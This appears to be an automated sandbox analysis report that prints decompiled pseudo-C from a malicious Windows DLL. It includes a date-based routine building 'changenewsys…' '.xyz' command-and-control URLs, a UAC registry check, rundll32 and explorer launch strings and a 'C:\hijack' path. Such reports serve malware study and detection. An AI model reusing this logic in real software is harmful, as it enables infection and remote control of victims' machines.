                                                                                                                                                                      • Part of subcall function 10019D10: GetSystemDefaultLCID.KERNEL32 ref: 10019D1D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DefaultExistsFilePathSystem
                                                                                                                                                                    • String ID: -0.25$45.0.0$C:\hijack$exe$install$status=main_start$user01
                                                                                                                                                                    • API String ID: 482051434-1656717437
                                                                                                                                                                    • Opcode ID: 0a904efb4324982fc1db73172a1754b2f1969f879e70f59afb907af5123e15f7
                                                                                                                                                                    • Instruction ID: 76c3a66b6cadf2752fd619ea01efa0c867ff815aaebb18d2e7d5061645e6b307
                                                                                                                                                                    • Opcode Fuzzy Hash: 0a904efb4324982fc1db73172a1754b2f1969f879e70f59afb907af5123e15f7
                                                                                                                                                                    • Instruction Fuzzy Hash: 0501F978D083189FD750FFA49C4A7DE77B2DF40254F900198FD0866143EB31B5909E62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                    			E1002185A(void* __ebx, void* __edx, void* __edi) {
                                                                                                                                                                    				void* _t60;
                                                                                                                                                                    				void* _t80;
                                                                                                                                                                    				void* _t101;
                                                                                                                                                                    				void* _t154;
                                                                                                                                                                    				void* _t156;
                                                                                                                                                                    				void* _t158;
                                                                                                                                                                    				void* _t171;
                                                                                                                                                                    
                                                                                                                                                                    				L0:
                                                                                                                                                                    				while(1) {
                                                                                                                                                                    					L0:
                                                                                                                                                                    					_t150 = __edi;
                                                                                                                                                                    					_t106 = __ebx;
                                                                                                                                                                    					 *((intOrPtr*)(_t154 - 0xe2e0)) =  *((intOrPtr*)(_t154 - 0xe2e0)) + 1;
                                                                                                                                                                    					_t60 = E100021E0(_t154 - 0xe2a4);
                                                                                                                                                                    					_t174 =  *((intOrPtr*)(_t154 - 0xe2e0)) - _t60;
                                                                                                                                                                    					if( *((intOrPtr*)(_t154 - 0xe2e0)) >= _t60) {
                                                                                                                                                                    						break;
                                                                                                                                                                    					}
                                                                                                                                                                    					L2:
                                                                                                                                                                    					E1000CF20(__edi, _t154 - 0xab84, 0, 0x3710);
                                                                                                                                                                    					E1000CF20(_t150, _t154 - 0x3d54, 0, 0x3710);
                                                                                                                                                                    					_t80 = E10001A50(E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=");
                                                                                                                                                                    					_t151 = _t80 - E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0))));
                                                                                                                                                                    					E1000D190(__ebx, _t150, _t80 - E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t154 - 0xab84, E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t80 - E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))));
                                                                                                                                                                    					E1000D8A3( *((intOrPtr*)(_t154 - 0xe2e0)), _t154 - 0x3d54, 0x3710, E10001A50(E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=") + 1);
                                                                                                                                                                    					E1000CF20(_t150, _t154 - 0xe294, 0, 0x3710);
                                                                                                                                                                    					E1000CF20(_t150, _t154 - 0x746c, 0, 0x3710);
                                                                                                                                                                    					E1000CC93(_t150, _t154 - 0xe294,  *((intOrPtr*)(_t154 - 0x3d58)), _t154 - 0xab84);
                                                                                                                                                                    					_push(_t154 - 0x3d54);
                                                                                                                                                                    					_push(_t154 - 0xe294);
                                                                                                                                                                    					_push( *((intOrPtr*)(_t154 + 8)));
                                                                                                                                                                    					E1000CC93(_t150, _t154 - 0x746c,  *((intOrPtr*)(_t154 - 0x7470)),  *((intOrPtr*)(_t154 - 0x18)));
                                                                                                                                                                    					_t171 = _t156 + 0x7c;
                                                                                                                                                                    					if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
                                                                                                                                                                    						E1000D190(_t106, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x746c, E1000CAC0(_t154 - 0x746c));
                                                                                                                                                                    						_t171 = _t171 + 0x10;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t101 = E1000CAC0(_t154 - 0x746c);
                                                                                                                                                                    					_t156 = _t171 + 4;
                                                                                                                                                                    					 *((intOrPtr*)(_t154 - 0x14)) = _t101 +  *((intOrPtr*)(_t154 - 0x14));
                                                                                                                                                                    				}
                                                                                                                                                                    				L5:
                                                                                                                                                                    				 *((char*)(_t154 - 4)) = 1;
                                                                                                                                                                    				E100011A0(_t154 - 0xe2dc);
                                                                                                                                                                    				 *((char*)(_t154 - 4)) = 0;
                                                                                                                                                                    				E10003010(_t154 - 0xe2a4);
                                                                                                                                                                    				 *((intOrPtr*)(_t154 - 4)) = 0xffffffff;
                                                                                                                                                                    				E100011A0(_t154 - 0xe2c0);
                                                                                                                                                                    				 *(_t154 - 0x10) = "\r\n%s%s%s\r\n";
                                                                                                                                                                    				 *((char*)(_t154 - 0x21c)) = 0;
                                                                                                                                                                    				E1000CF20(__edi, _t154 - 0x21b, 0, 0x1ff);
                                                                                                                                                                    				_push( *((intOrPtr*)(_t154 - 0x18)));
                                                                                                                                                                    				_push( *((intOrPtr*)(_t154 + 8)));
                                                                                                                                                                    				E1000CC93(_t150, _t154 - 0x21c,  *(_t154 - 0x10),  *((intOrPtr*)(_t154 - 0x18)));
                                                                                                                                                                    				_t158 = _t156 + 0x20;
                                                                                                                                                                    				if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
                                                                                                                                                                    					E1000D190(__ebx, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x21c, E1000CAC0(_t154 - 0x21c));
                                                                                                                                                                    					_t158 = _t158 + 0x10;
                                                                                                                                                                    				}
                                                                                                                                                                    				 *((intOrPtr*)(_t154 - 0x14)) = E1000CAC0(_t154 - 0x21c) +  *((intOrPtr*)(_t154 - 0x14));
                                                                                                                                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t154 - 0xc));
                                                                                                                                                                    				return  *((intOrPtr*)(_t154 - 0x14));
                                                                                                                                                                    			}











                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memset$_strlen$_sprintf$__output_l_strcpy_s
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3854912713-0
                                                                                                                                                                    • Opcode ID: b322046e219f78ca5d588c42d31cd5ab94df7dbf5b27a50053a166c6a7f0d488
                                                                                                                                                                    • Instruction ID: ecc14f8781584b065d37a28c2fb0b24bdd6a5e60bbd0adb2cb8e7c12e54bf0d8
                                                                                                                                                                    • Opcode Fuzzy Hash: b322046e219f78ca5d588c42d31cd5ab94df7dbf5b27a50053a166c6a7f0d488
                                                                                                                                                                    • Instruction Fuzzy Hash: 3B4192B6D002186BDB14D7A0DC92EEE737DEF54280F0449A9F50DB6246EA747B448BA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                    			E100223F0(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                    				char _v16;
                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                    				char _v24;
                                                                                                                                                                    				char _v36;
                                                                                                                                                                    				char _v292;
                                                                                                                                                                    				signed int _v296;
                                                                                                                                                                    				char _v300;
                                                                                                                                                                    				intOrPtr _v304;
                                                                                                                                                                    				char _v308;
                                                                                                                                                                    				intOrPtr _v312;
                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                    				char _t61;
                                                                                                                                                                    				char _t62;
                                                                                                                                                                    				signed int _t70;
                                                                                                                                                                    				intOrPtr _t102;
                                                                                                                                                                    				intOrPtr _t103;
                                                                                                                                                                    				char _t115;
                                                                                                                                                                    				char _t116;
                                                                                                                                                                    				signed int _t118;
                                                                                                                                                                    
                                                                                                                                                                    				_t132 = __esi;
                                                                                                                                                                    				_t131 = __edi;
                                                                                                                                                                    				_t101 = __ebx;
                                                                                                                                                                    				_t61 = "rundll32"; // 0x646e7572
                                                                                                                                                                    				_v24 = _t61;
                                                                                                                                                                    				_t102 =  *0x100254e4; // 0x32336c6c
                                                                                                                                                                    				_v20 = _t102;
                                                                                                                                                                    				_t115 =  *0x100254e8; // 0x0
                                                                                                                                                                    				_v16 = _t115;
                                                                                                                                                                    				_t62 = "explorer"; // 0x6c707865
                                                                                                                                                                    				_v308 = _t62;
                                                                                                                                                                    				_t103 =  *0x100254f0; // 0x7265726f
                                                                                                                                                                    				_v304 = _t103;
                                                                                                                                                                    				_t116 =  *0x100254f4; // 0x0
                                                                                                                                                                    				_v300 = _t116;
                                                                                                                                                                    				E1000CF20(__edi,  &_v292, 0, 0x108);
                                                                                                                                                                    				E1001F150( &_v24,  &_v292,  &_v24);
                                                                                                                                                                    				E1000D190(__ebx, _t131, __esi,  &_v36,  &_v308, 8);
                                                                                                                                                                    				_t118 = _a4;
                                                                                                                                                                    				_v12 = E1000CAC0(_t118);
                                                                                                                                                                    				_v296 = 0;
                                                                                                                                                                    				_t70 = _v12 & 0x80000007;
                                                                                                                                                                    				if(_t70 < 0) {
                                                                                                                                                                    					_t70 = (_t70 - 0x00000001 | 0xfffffff8) + 1;
                                                                                                                                                                    				}
                                                                                                                                                                    				if(_t70 == 0) {
                                                                                                                                                                    					_t120 = _v12 + 8;
                                                                                                                                                                    					__eflags = _t120;
                                                                                                                                                                    					_v296 = _t120;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                    					_t120 = _t118 & 0x00000007;
                                                                                                                                                                    					_v296 = 8 + (_v12 + (_t118 & 0x00000007) >> 3) * 8;
                                                                                                                                                                    				}
                                                                                                                                                                    				_v8 = L1000CE56(_t101, _t120, _t131, _t132, _v296);
                                                                                                                                                                    				E1000CF20(_t131, _v8, 0, _v296);
                                                                                                                                                                    				E1000D190(_t101, _t131, _t132, _v8, _a4, E1000CAC0(_a4));
                                                                                                                                                                    				E1001F0B0(_t101, _v8, _t131, _t132,  &_v292, _v8, _v8, _v296);
                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                    				_v312 = L1000CE56(_t101, 1 + (_v296 + 2) / 3 * 4, _t131, _t132, 1 + (_v296 + 2) / 3 * 4);
                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                    				E1000CF20(_t131, _v312, 0, 1 + (_v296 + 2) / 3 * 4);
                                                                                                                                                                    				_t90 = _v296 + 2;
                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                    				E1001F240(_v312, 1 + (_v296 + 2) / 3 * 4, _v8, _v296);
                                                                                                                                                                    				_push(_v8);
                                                                                                                                                                    				E1000CA30(_t101, _t131, _t132, _t90 % 3);
                                                                                                                                                                    				return _v312;
                                                                                                                                                                    			}

























Memory Dump Source
• Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
• Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
• Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
• Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
• Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memset$_strlen
                                                                                                                                                                    • String ID: explorer$rundll32
                                                                                                                                                                    • API String ID: 1975251954-2912785976
                                                                                                                                                                    • Opcode ID: c1e6a0fdb6488fddb4f6070d290b58589a25d59a5c82d9815c184508ac71ae6d
                                                                                                                                                                    • Instruction ID: 8d15330d89fc5d0acd7d9b91591f78a2dd970f15495d3f7c9849200120727594
                                                                                                                                                                    • Opcode Fuzzy Hash: c1e6a0fdb6488fddb4f6070d290b58589a25d59a5c82d9815c184508ac71ae6d
                                                                                                                                                                    • Instruction Fuzzy Hash: 84515FBAD00218ABDB14DB98DC92FEEB3B9EB4C304F044199E50997341E635BB54CF95
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E1001DC00(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                    				struct _OSVERSIONINFOW _v284;
                                                                                                                                                                    				char _v547;
                                                                                                                                                                    				char _v548;
                                                                                                                                                                    				char _v819;
                                                                                                                                                                    				char _v820;
                                                                                                                                                                    				char _v824;
                                                                                                                                                                    				void* _t31;
                                                                                                                                                                    				void* _t38;
                                                                                                                                                                    				void* _t41;
                                                                                                                                                                    				void* _t49;
                                                                                                                                                                    				void* _t50;
                                                                                                                                                                    				void* _t51;
                                                                                                                                                                    				void* _t53;
                                                                                                                                                                    				void* _t57;
                                                                                                                                                                    				void* _t69;
                                                                                                                                                                    				void* _t70;
                                                                                                                                                                    				void* _t71;
                                                                                                                                                                    				void* _t74;
                                                                                                                                                                    				void* _t75;
                                                                                                                                                                    				void* _t77;
                                                                                                                                                                    
                                                                                                                                                                    				_t69 = __esi;
                                                                                                                                                                    				_t68 = __edi;
                                                                                                                                                                    				_t57 = __ebx;
                                                                                                                                                                    				if(_a4 == 0) {
                                                                                                                                                                    					return _t31;
                                                                                                                                                                    				}
                                                                                                                                                                    				_v820 = 0;
                                                                                                                                                                    				E1000CF20(__edi,  &_v819, 0, 0x103);
                                                                                                                                                                    				_v548 = 0;
                                                                                                                                                                    				_t58 =  &_v547;
                                                                                                                                                                    				E1000CF20(_t68,  &_v547, 0, 0x103);
                                                                                                                                                                    				_t65 =  &(_v284.dwMajorVersion);
                                                                                                                                                                    				E1000CF20(_t68,  &(_v284.dwMajorVersion), 0, 0x110);
                                                                                                                                                                    				_t74 = _t71 + 0x24;
                                                                                                                                                                    				_v284.dwOSVersionInfoSize = 0x114;
                                                                                                                                                                    				GetVersionExW( &_v284);
                                                                                                                                                                    				if(_v284.dwMajorVersion != 6 || _v284.dwMinorVersion != 2 || E1001D240() == 0) {
                                                                                                                                                                    					_t38 = E1001D7E0(_t68,  &_v548);
                                                                                                                                                                    					_t75 = _t74 + 4;
                                                                                                                                                                    					__eflags = _t38;
                                                                                                                                                                    					if(_t38 != 0) {
                                                                                                                                                                    						L11:
                                                                                                                                                                    						E1001D2D0(_t58,  &_v548);
                                                                                                                                                                    						_t65 =  &_v820;
                                                                                                                                                                    						_t41 = E1001CCF0( &_v820, 0x104,  &_v824);
                                                                                                                                                                    						_t77 = _t75 + 0x10;
                                                                                                                                                                    						__eflags = _t41;
                                                                                                                                                                    						if(_t41 >= 0) {
                                                                                                                                                                    							_t65 = 0x104 - _v824;
                                                                                                                                                                    							__eflags = 0x104;
                                                                                                                                                                    							E1001CC50( &_v548, 0x104 - _v824, _t70 + _v824 - 0x330);
                                                                                                                                                                    							_t77 = _t77 + 0xc;
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L13;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t49 = E1001D560(_t68,  &_v548);
                                                                                                                                                                    					_t75 = _t75 + 4;
                                                                                                                                                                    					__eflags = _t49;
                                                                                                                                                                    					if(_t49 != 0) {
                                                                                                                                                                    						goto L11;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t58 =  &_v548;
                                                                                                                                                                    					_t50 = E1001DA70(_t68,  &_v548);
                                                                                                                                                                    					_t75 = _t75 + 4;
                                                                                                                                                                    					__eflags = _t50;
                                                                                                                                                                    					if(_t50 != 0) {
                                                                                                                                                                    						goto L11;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t65 =  &_v548;
                                                                                                                                                                    					_t51 = E1001D370(_t57, _t68, _t69,  &_v548);
                                                                                                                                                                    					_t77 = _t75 + 4;
                                                                                                                                                                    					__eflags = _t51;
                                                                                                                                                                    					if(_t51 == 0) {
                                                                                                                                                                    						goto L13;
                                                                                                                                                                    					}
                                                                                                                                                                    					goto L11;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t53 = E1001DA70(_t68,  &_v548);
                                                                                                                                                                    					_t77 = _t74 + 4;
                                                                                                                                                                    					_t84 = _t53;
                                                                                                                                                                    					if(_t53 != 0) {
                                                                                                                                                                    						_t65 =  &_v548;
                                                                                                                                                                    						E1001D2D0( &_v548,  &_v548);
                                                                                                                                                                    						E1001D320(_t84,  &_v820,  &_v548);
                                                                                                                                                                    						_t77 = _t77 + 0xc;
                                                                                                                                                                    					}
                                                                                                                                                                    					L13:
                                                                                                                                                                    					if(_v820 == 0) {
                                                                                                                                                                    						_t65 =  &_v820;
                                                                                                                                                                    						E1001CFA0("Mid2Failed", 0x104,  &_v820);
                                                                                                                                                                    						_t77 = _t77 + 0xc;
                                                                                                                                                                    					}
                                                                                                                                                                    					return E1000D8A3(_t65, _a4, 0x104,  &_v820);
                                                                                                                                                                    				}
                                                                                                                                                                    			}
























                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 1001DC28
                                                                                                                                                                    • _memset.LIBCMT ref: 1001DC45
                                                                                                                                                                    • _memset.LIBCMT ref: 1001DC5B
                                                                                                                                                                    • GetVersionExW.KERNEL32(00000114), ref: 1001DC74
                                                                                                                                                                    • _strcpy_s.LIBCMT ref: 1001DDA9
                                                                                                                                                                      • Part of subcall function 1001D240: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D27E
                                                                                                                                                                      • Part of subcall function 1001D240: RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D29F
                                                                                                                                                                      • Part of subcall function 1001D240: RegCloseKey.ADVAPI32(00000000), ref: 1001D2B9
                                                                                                                                                                      • Part of subcall function 1001DA70: wsprintfW.USER32 ref: 1001DABC
                                                                                                                                                                      • Part of subcall function 1001DA70: CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DAD8
                                                                                                                                                                      • Part of subcall function 1001DA70: _memset.LIBCMT ref: 1001DB21
                                                                                                                                                                      • Part of subcall function 1001DA70: DeviceIoControl.KERNEL32 ref: 1001DB50
                                                                                                                                                                      • Part of subcall function 1001DA70: _memset.LIBCMT ref: 1001DB68
                                                                                                                                                                      • Part of subcall function 1001DA70: CloseHandle.KERNEL32(000000FF), ref: 1001DBB4
                                                                                                                                                                      • Part of subcall function 1001D2D0: _strlen.LIBCMT ref: 1001D2DE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memset$Close$ControlCreateDeviceFileHandleOpenQueryValueVersion_strcpy_s_strlenwsprintf
                                                                                                                                                                    • String ID: Mid2Failed
                                                                                                                                                                    • API String ID: 2934472556-1001836097
                                                                                                                                                                    • Opcode ID: 434b6e32a3c6e1f2745455de6dca3a5a8c35b3b9910fd8773f32aa561de938fc
                                                                                                                                                                    • Instruction ID: aa707a60008127caf2ce8d05e14bba9426138a7f06fddb79af8b759b423a3348
                                                                                                                                                                    • Opcode Fuzzy Hash: 434b6e32a3c6e1f2745455de6dca3a5a8c35b3b9910fd8773f32aa561de938fc
                                                                                                                                                                    • Instruction Fuzzy Hash: 224184B5C0021967EB14F7A0AC86FEA737DEB14744F4404A9EA0899142F771FBC8CB92
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                                                    			E100225D0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                    				char _v8;
                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                    				struct _SYSTEMTIME _v36;
                                                                                                                                                                    				char _v303;
                                                                                                                                                                    				char _v304;
                                                                                                                                                                    				char _v332;
                                                                                                                                                                    				char _v360;
                                                                                                                                                                    				char _v388;
                                                                                                                                                                    				signed int _v392;
                                                                                                                                                                    				intOrPtr _v396;
                                                                                                                                                                    				intOrPtr _v400;
                                                                                                                                                                    				intOrPtr _v404;
                                                                                                                                                                    				intOrPtr _v408;
                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                    				intOrPtr _t91;
                                                                                                                                                                    
                                                                                                                                                                    				_t97 = __eflags;
                                                                                                                                                                    				_t89 = __edi;
                                                                                                                                                                    				_push(0xffffffff);
                                                                                                                                                                    				_push(E10022A77);
                                                                                                                                                                    				_push( *[fs:0x0]);
                                                                                                                                                                    				 *[fs:0x0] = _t91;
                                                                                                                                                                    				_v392 = 0;
                                                                                                                                                                    				E10001160( &_v332, __eflags, "http://");
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				_v304 = 0;
                                                                                                                                                                    				E1000CF20(__edi,  &_v303, 0, 0x103);
                                                                                                                                                                    				_v36.wYear = 0;
                                                                                                                                                                    				_v36.wMonth = 0;
                                                                                                                                                                    				_v36.wDay = 0;
                                                                                                                                                                    				_v36.wMinute = 0;
                                                                                                                                                                    				_v36.wMilliseconds = 0;
                                                                                                                                                                    				GetLocalTime( &_v36);
                                                                                                                                                                    				_push(_v36.wDay & 0x0000ffff);
                                                                                                                                                                    				_push(_v36.wMonth & 0x0000ffff);
                                                                                                                                                                    				E1000CC93(_t89,  &_v304, "changenewsys%04d%02d%02d", _v36.wYear & 0x0000ffff);
                                                                                                                                                                    				_v20 = E1001A480(__ebx, _v36.wYear & 0x0000ffff, _t89, __esi, _t97,  &_v304);
                                                                                                                                                                    				_v396 = E10001160( &_v360, _t97, _v20);
                                                                                                                                                                    				_v400 = _v396;
                                                                                                                                                                    				_v8 = 1;
                                                                                                                                                                    				E10001A70( &_v332, _v400);
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				E100011A0( &_v360);
                                                                                                                                                                    				_push(_v20);
                                                                                                                                                                    				E1000CA30(__ebx, _t89, __esi, _t97);
                                                                                                                                                                    				_v404 = E10001160( &_v388, _t97, ".xyz/");
                                                                                                                                                                    				_v408 = _v404;
                                                                                                                                                                    				_v8 = 2;
                                                                                                                                                                    				E10001A70( &_v332, _v408);
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				E100011A0( &_v388);
                                                                                                                                                                    				E10001110(_a4, _t97,  &_v332);
                                                                                                                                                                    				_v392 = _v392 | 0x00000001;
                                                                                                                                                                    				_v8 = 0xffffffff;
                                                                                                                                                                    				E100011A0( &_v332);
                                                                                                                                                                    				 *[fs:0x0] = _v16;
                                                                                                                                                                    				return _a4;
                                                                                                                                                                    			}




















                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 10022624
                                                                                                                                                                    • GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 10022645
                                                                                                                                                                    • _sprintf.LIBCMT ref: 10022666
                                                                                                                                                                      • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                                      • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                                      • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                                      • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                                      • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                                      • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                                      • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                                      • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                                      • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                                      • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastLocalTime___sbh_find_block___sbh_free_block
                                                                                                                                                                    • String ID: .xyz/$changenewsys%04d%02d%02d$http://
                                                                                                                                                                    • API String ID: 984892819-377150047
                                                                                                                                                                    • Opcode ID: 01893e789d72bc6740a2a515bf2c20aba140765a16ad56bf668e112c6c4f99eb
                                                                                                                                                                    • Instruction ID: 81f1802f078645e924587200c16c269d37407c15be22a51fe8bac89201a43415
                                                                                                                                                                    • Opcode Fuzzy Hash: 01893e789d72bc6740a2a515bf2c20aba140765a16ad56bf668e112c6c4f99eb
                                                                                                                                                                    • Instruction Fuzzy Hash: 08412975C04228ABDB14CBA4DC51BEEB7B4EF08744F4081E9F509A7291EB346B84CF91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 67%
                                                                                                                                                                    			E1001FEA0(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
                                                                                                                                                                    				char _v8;
                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                    				char _v44;
                                                                                                                                                                    				char _v311;
                                                                                                                                                                    				char _v312;
                                                                                                                                                                    				char _v575;
                                                                                                                                                                    				char _v576;
                                                                                                                                                                    				void* _t30;
                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                    				void* _t50;
                                                                                                                                                                    
                                                                                                                                                                    				_t50 = __eflags;
                                                                                                                                                                    				_t41 = __edi;
                                                                                                                                                                    				_push(0xffffffff);
                                                                                                                                                                    				_push(E10022AF1);
                                                                                                                                                                    				_push( *[fs:0x0]);
                                                                                                                                                                    				 *[fs:0x0] = _t43;
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				_v576 = 0;
                                                                                                                                                                    				E1000CF20(__edi,  &_v575, 0, 0x103);
                                                                                                                                                                    				_v312 = 0;
                                                                                                                                                                    				E1000CF20(_t41,  &_v311, 0, 0x103);
                                                                                                                                                                    				E1001A600(__ebx, _t41, __esi, _t50,  &_v44);
                                                                                                                                                                    				GetTempPathA(0x104,  &_v576);
                                                                                                                                                                    				_push(E100011E0( &_a4));
                                                                                                                                                                    				_push("0011");
                                                                                                                                                                    				_push(E100011E0( &_v44));
                                                                                                                                                                    				E1000CC93(_t41,  &_v312, "%s%s %s %s",  &_v576);
                                                                                                                                                                    				E1001A1D0(_t50,  &_v312);
                                                                                                                                                                    				E100011A0( &_v44);
                                                                                                                                                                    				_v8 = 0xffffffff;
                                                                                                                                                                    				_t30 = E100011A0( &_a4);
                                                                                                                                                                    				 *[fs:0x0] = _v16;
                                                                                                                                                                    				return _t30;
                                                                                                                                                                    			}














                                                                                                                                                                    APIs
